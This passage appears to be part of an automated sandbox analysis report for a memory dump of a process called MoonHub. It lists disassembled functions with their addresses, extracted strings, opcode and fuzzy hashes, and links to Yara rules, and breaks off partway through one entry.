                                                                                                                                                                                • Instruction ID: 525cda2228f2f95e06dbbeb4e7d8f2f4027538f7aaddb36a391d7e58e3f19c02
                                                                                                                                                                                • Opcode Fuzzy Hash: 006768cd3673fd90fd1d954dd901fb5696eeac4c02a2a620e15369acb66b32f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41C130E0C94A8FEB88EE68C4546BE77E2FFA8348F144179D409D3295EF389842CB45
                                                                                                                                                                                Function 00007FF848E9F2FA Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: _
                                                                                                                                                                                • API String ID: 0-701932520
                                                                                                                                                                                • Opcode ID: 09b2d02a437f2effc3ac5cb4055400e9bd35d026c3be7ab2f37dd5fa7f294180
                                                                                                                                                                                • Instruction ID: cb3ad91a56d5cf7438ecd38d1696ba434874e2c201da0c8d3af738b5749d87e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 09b2d02a437f2effc3ac5cb4055400e9bd35d026c3be7ab2f37dd5fa7f294180
                                                                                                                                                                                • Instruction Fuzzy Hash: BB41663190EA49AFE745FBB8C8645FA7BE2FF46315F0401BAD049DB1A2EE2C18028750
                                                                                                                                                                                Function 00007FF848EA164D Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: KE
                                                                                                                                                                                • API String ID: 0-4044011341
                                                                                                                                                                                • Opcode ID: 7e688fb56f066e59506631b91c6b269009ce1b72beb4b9e465daa28464ca41a5
                                                                                                                                                                                • Instruction ID: 0721c74d829d4a4797b30ae0ac81ac5959d40c556a85326e1eabc0948d19cf38
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e688fb56f066e59506631b91c6b269009ce1b72beb4b9e465daa28464ca41a5
                                                                                                                                                                                • Instruction Fuzzy Hash: EE310732E0DE4A5FE615BA7C64991F6B7D0FFA5360F0802BBC08DC6093DE2994478255
                                                                                                                                                                                Function 00007FF848EAB7F8 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: d5b385d7414369306fe30138e8d7af3e620a38efa9d1a01985adfbdd3577ab37
                                                                                                                                                                                • Instruction ID: 8eec67612fd59eda2713d191e749a5c290b353845a892640cd35e01288db1f7a
                                                                                                                                                                                • Opcode Fuzzy Hash: d5b385d7414369306fe30138e8d7af3e620a38efa9d1a01985adfbdd3577ab37
                                                                                                                                                                                • Instruction Fuzzy Hash: F0319821B0DD0E4FEB94F95D548967523D1FF69391F0000BAD90DCB2A6DE299C868784
                                                                                                                                                                                Function 00007FF848EAC540 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H_H
                                                                                                                                                                                • API String ID: 0-284316983
                                                                                                                                                                                • Opcode ID: 8972767df8704891cc78d195a9906d26b9e0d2d45f75781a47a311b4059995a1
                                                                                                                                                                                • Instruction ID: ee2229d0622da2a48714a3f26a34d456ca957d5dddb08309e617a26e9c109aef
                                                                                                                                                                                • Opcode Fuzzy Hash: 8972767df8704891cc78d195a9906d26b9e0d2d45f75781a47a311b4059995a1
                                                                                                                                                                                • Instruction Fuzzy Hash: E731C021E0C94B5FEB9CEA689454A7426D2FF59391F1881B9D80EC72C2CF39AC468B45
                                                                                                                                                                                Function 00007FF848EA1680 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: KE
                                                                                                                                                                                • API String ID: 0-4044011341
                                                                                                                                                                                • Opcode ID: eb18a84390de0c748171a8c7957cde230aa87bc6ded8b5ee80e4f1810f1ca328
                                                                                                                                                                                • Instruction ID: 705612c51ac040965cededd7bead06e4d52fa57f757d1ed89c65dee1d2f6acdb
                                                                                                                                                                                • Opcode Fuzzy Hash: eb18a84390de0c748171a8c7957cde230aa87bc6ded8b5ee80e4f1810f1ca328
                                                                                                                                                                                • Instruction Fuzzy Hash: 72212922E0DE8A1FE655B67C14A51F677D1FFA5260F0802B7D08EC7087EE2DA4464255
                                                                                                                                                                                Function 00007FF848E92A7A Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Pc=j
                                                                                                                                                                                • API String ID: 0-1733780799
                                                                                                                                                                                • Opcode ID: 9fc6f5768ebdbdfd79e42ae596d00d9d555adca270f07978fe1083c0533f91fb
                                                                                                                                                                                • Instruction ID: a5da8069f1ded95d16753b0fd2e33d56c08cc6dc5a51e0451b3d6545284299ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fc6f5768ebdbdfd79e42ae596d00d9d555adca270f07978fe1083c0533f91fb
                                                                                                                                                                                • Instruction Fuzzy Hash: 1921553181D7C64FCB56A77848154A57BE0FF42271B0901FBE098CB0A3DFA8D802C382
                                                                                                                                                                                Function 00007FF848E9C2B4 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: aK_H
                                                                                                                                                                                • API String ID: 0-2603984226
                                                                                                                                                                                • Opcode ID: 9f0dbbb8235ea8736352c0a46e8c9c751e7c4ebd121b6a777276b976fbffaf5f
                                                                                                                                                                                • Instruction ID: 601384e2487f6cf603f7551dbe950aa55ac1014ca4ed591942815160bed1e3da
                                                                                                                                                                                • Opcode Fuzzy Hash: 9f0dbbb8235ea8736352c0a46e8c9c751e7c4ebd121b6a777276b976fbffaf5f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F217C71A0894A9FEB84FB6C8455AA973D1FF68344F0404B9D40DCB297DF78E8828B44
                                                                                                                                                                                Function 00007FF848EACE49 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: d9f35b650f12d8f6d390195f81d8f9552819531509f1041530d9d3bb6fc3f1ff
                                                                                                                                                                                • Instruction ID: 583ea76165ec1ee61b6abfeae61293b5c311e3ec27b388d95f72cc73fdeefdaf
                                                                                                                                                                                • Opcode Fuzzy Hash: d9f35b650f12d8f6d390195f81d8f9552819531509f1041530d9d3bb6fc3f1ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E114F3161CE059FDA58FB2CD4559A577E2FFA875070942E9E00AC7297DF28EC018784
                                                                                                                                                                                Function 00007FF848E9C0CB Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: e5de54e82b36a6e62a8effe5b663499bd4c855c68db7feb439e30acc0c8de3c5
                                                                                                                                                                                • Instruction ID: f6eef3a9ec21811ec00256fc0d9b848eddfaee41d2fec060716d3d02c86e5060
                                                                                                                                                                                • Opcode Fuzzy Hash: e5de54e82b36a6e62a8effe5b663499bd4c855c68db7feb439e30acc0c8de3c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A213074918A4E8FDB88EF58C898AE973F1FF68304F544579D42AC7296DF35A842CB40
                                                                                                                                                                                Function 00007FF848E96C19 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j
                                                                                                                                                                                • API String ID: 0-208192931
                                                                                                                                                                                • Opcode ID: 3fa9c1541f1c98ecd7071c1c1cf4d55f2c835224c82a7354da2b0fa930f76eff
                                                                                                                                                                                • Instruction ID: 9453edabb5e4a5e6c3f01a55011fdee22de4825b487548c77334c449ecdf464d
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa9c1541f1c98ecd7071c1c1cf4d55f2c835224c82a7354da2b0fa930f76eff
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F11B412D0E696AFE790B7B82C552A13BD0FF16688F5440B6E488C71A3DB6C6C058266
                                                                                                                                                                                Function 00007FF848EA415E Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: 1d6ed1ae9c653d00a49105640ad59f5f0e6d555f96a645ba4ed98b4f38f7447e
                                                                                                                                                                                • Instruction ID: 3b350a7f853478f00f514a8994382f801cfe5815d0ec46739cedc1ec7a4ef0db
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d6ed1ae9c653d00a49105640ad59f5f0e6d555f96a645ba4ed98b4f38f7447e
                                                                                                                                                                                • Instruction Fuzzy Hash: 29215430A0CA4A4FEBC9FF2884517E977D2FFA5744F1445A4D41DC728ADE38E8428784
                                                                                                                                                                                Function 00007FF848E96C27 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j
                                                                                                                                                                                • API String ID: 0-208192931
                                                                                                                                                                                • Opcode ID: a9b99e8d547903a26305d0eb8c6820879e7c42620221af1a9e85e01a58d74bbe
                                                                                                                                                                                • Instruction ID: a19cb72dd5245425420e38a8d810ceea17b8859d214032f28aed8a788ae6097e
                                                                                                                                                                                • Opcode Fuzzy Hash: a9b99e8d547903a26305d0eb8c6820879e7c42620221af1a9e85e01a58d74bbe
                                                                                                                                                                                • Instruction Fuzzy Hash: A5110812D1DA57AFE6D077FC28552A03BC0FF09AC8F8400B6E888C71A3DA6D6C458296
                                                                                                                                                                                Function 00007FF848EACE31 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: 8eab01303d3bb2e7b100d676b6c036c284af160a5465b7f1a1216f3d63f676e0
                                                                                                                                                                                • Instruction ID: e33abc4dc77289d8950db91cc78e0243aee472e5274a85208f18f76a8b36f8d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 8eab01303d3bb2e7b100d676b6c036c284af160a5465b7f1a1216f3d63f676e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D11217561CE059FCB94FB2CE45596577E2FF9972030906E9D049CB2A6DF24FC018B84
                                                                                                                                                                                Function 00007FF848EA3D9C Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-237927418
                                                                                                                                                                                • Opcode ID: bee6305f6a9b921b6c5eb496b87373c830503cfb18cf71320ad67674c4fb5050
                                                                                                                                                                                • Instruction ID: 8d047c9ff572ea12aec4240dc9e5945bfd1c538b878479e036ad5b88f76a7cef
                                                                                                                                                                                • Opcode Fuzzy Hash: bee6305f6a9b921b6c5eb496b87373c830503cfb18cf71320ad67674c4fb5050
                                                                                                                                                                                • Instruction Fuzzy Hash: 9511E53680D78D5FD711BB7898151E9BFF0FF86250F0501EBD449C7093EA3819558752
                                                                                                                                                                                Function 00007FF848EA3DC9 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-237927418
                                                                                                                                                                                • Opcode ID: ca0f528ec345810b73c2f786c46164d85a6102f0268ec84311b8880a04b4cc68
                                                                                                                                                                                • Instruction ID: 4000488b46b78ed5f8c2dd52cc4d7dca8b4d1e9b751841c60a37188b36e7d7d7
                                                                                                                                                                                • Opcode Fuzzy Hash: ca0f528ec345810b73c2f786c46164d85a6102f0268ec84311b8880a04b4cc68
                                                                                                                                                                                • Instruction Fuzzy Hash: F301283188D7C95FD352A7785C695E57FF0EF86610F0901E7E449C7093D92C19568362
                                                                                                                                                                                Function 00007FF848E92EC0 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xc=j
                                                                                                                                                                                • API String ID: 0-2732805584
                                                                                                                                                                                • Opcode ID: b61929c059631d3525d12c601169386835a4039824e422c46575066b5733366f
                                                                                                                                                                                • Instruction ID: 26cc5de57cc2bd9428d76234ab3a25da4d20c24dea78194ccc421729ecc4da74
                                                                                                                                                                                • Opcode Fuzzy Hash: b61929c059631d3525d12c601169386835a4039824e422c46575066b5733366f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5401757172CB406BD308ABAC981626AF7D1EF89740F50457DF44AC3293CE28A8414596
                                                                                                                                                                                Function 00007FF848E98915 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j
                                                                                                                                                                                • API String ID: 0-638611851
                                                                                                                                                                                • Opcode ID: 29f80936dbf8fd17a6b098f175ca3e365458c72e438b0e5a6bb27c52c40f80a0
                                                                                                                                                                                • Instruction ID: 6c702b6a5bbd49fe064f5774de28fcec5e478cf7ca007ff90b3ce93cfbf26a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 29f80936dbf8fd17a6b098f175ca3e365458c72e438b0e5a6bb27c52c40f80a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 64F0D132C0D99D6FE365BA7868580B97FA0FF96244F4401FAE449C60A2EA7429068755
                                                                                                                                                                                Function 00007FF848EA93F1 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `a=j
                                                                                                                                                                                • API String ID: 0-2499299824
                                                                                                                                                                                • Opcode ID: dba720ef34fec2a61fc6047ad6addf01d11516b15ba9a1f7f181fe1779c5bf78
                                                                                                                                                                                • Instruction ID: 54a9b3630968d1880e8c646135473f547181bc0aea51cdb96c22d532999c6aa1
                                                                                                                                                                                • Opcode Fuzzy Hash: dba720ef34fec2a61fc6047ad6addf01d11516b15ba9a1f7f181fe1779c5bf78
                                                                                                                                                                                • Instruction Fuzzy Hash: BFF0F675C1D78D5FD391F76448690EA7FB0FF42600F0504EAD029C7092EA2858448302
                                                                                                                                                                                Function 00007FF848E9F893 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: TK_^
                                                                                                                                                                                • API String ID: 0-2151583479
                                                                                                                                                                                • Opcode ID: 253346c0495feedc0cc5e62e4779efbb6d87bf22db52941ca360baad0bfac307
                                                                                                                                                                                • Instruction ID: 4282fbd75f4b9f0dcbfac6044c421bdb5448644f9d402eb88f0cab3e43ca6998
                                                                                                                                                                                • Opcode Fuzzy Hash: 253346c0495feedc0cc5e62e4779efbb6d87bf22db52941ca360baad0bfac307
                                                                                                                                                                                • Instruction Fuzzy Hash: 01C0123246C6499BD341A710E4518EFB351FF90650F801B3AF04A410A9DEA466858582
                                                                                                                                                                                Function 00007FF848E9FBA5 Relevance: 1.1, Instructions: 1052COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ba7a30360ff22aa42ab64de7af9b08924d0971749b03ef7b61d891e42627fbe9
                                                                                                                                                                                • Instruction ID: 65ffcaed6e73f41388de157557b79d37ad7287815fc1638621208440e47c50c9
                                                                                                                                                                                • Opcode Fuzzy Hash: ba7a30360ff22aa42ab64de7af9b08924d0971749b03ef7b61d891e42627fbe9
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C82D27154E785AFD342E7B48C66ADB7FE1EF06760F4800EDE48ACB1A3DA6C08418B55
                                                                                                                                                                                Function 00007FF848E9FC32 Relevance: .9, Instructions: 902COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 11586b822d798503446946d6ee499d958da5623d2fceda54a21cd86ab29f1749
                                                                                                                                                                                • Instruction ID: a8a9fbf9fd0c91e94de64a35fc1d40e6aa9bdbf8bba61ad821b07ff15f02fd8f
                                                                                                                                                                                • Opcode Fuzzy Hash: 11586b822d798503446946d6ee499d958da5623d2fceda54a21cd86ab29f1749
                                                                                                                                                                                • Instruction Fuzzy Hash: AF62C27154E785AFD342E7B44C66ADB7FE1EF06760F4800EDE48A8B1A3E96C0C418B16
                                                                                                                                                                                Function 00007FF848EA0885 Relevance: .7, Instructions: 746COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5742ca825d4ff3e7909b4fefe76fcb8ae6d441182d5b045b5f5192e834507163
                                                                                                                                                                                • Instruction ID: ff86a92352d5b6f12508b1c3e27e948b50e426f70f7f61f33bff3b8eb4a19ce7
                                                                                                                                                                                • Opcode Fuzzy Hash: 5742ca825d4ff3e7909b4fefe76fcb8ae6d441182d5b045b5f5192e834507163
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D427030A18A4A8FDB88FF18C494AAA77E1FF98740F1445A9D41EC7296DF35EC42CB40
                                                                                                                                                                                Function 00007FF848EC3FF8 Relevance: .7, Instructions: 675COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6bd1c5a5fcd385f90e3167ebf46fb75c31eae8ab3b71dbed056e742e13e0aa6f
                                                                                                                                                                                • Instruction ID: 226d08c5becef08e9b11e4dfb8fb77c489bba3248cd1a8cfd60b459dc5f8448c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6bd1c5a5fcd385f90e3167ebf46fb75c31eae8ab3b71dbed056e742e13e0aa6f
                                                                                                                                                                                • Instruction Fuzzy Hash: BB128C31B1994A8FDBE4EB2C9858B6977E1FF98351B0500FAE44DC72A6DF249C458B40
                                                                                                                                                                                Function 00007FF848EA6FE3 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d213e0aa5e67b1e6e2d4f66c8bf91624610811373634b5321c30b216a89d3f33
                                                                                                                                                                                • Instruction ID: d3d377e0b97c72b6adaf0c179ff4b75d71819f42828007492826446c7a2aa554
                                                                                                                                                                                • Opcode Fuzzy Hash: d213e0aa5e67b1e6e2d4f66c8bf91624610811373634b5321c30b216a89d3f33
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF16774618A4E8FDBC8EF18C894AAA77E2FF98350F544569D41EC7296CB34EC52CB40
                                                                                                                                                                                Function 00007FF848EAC500 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
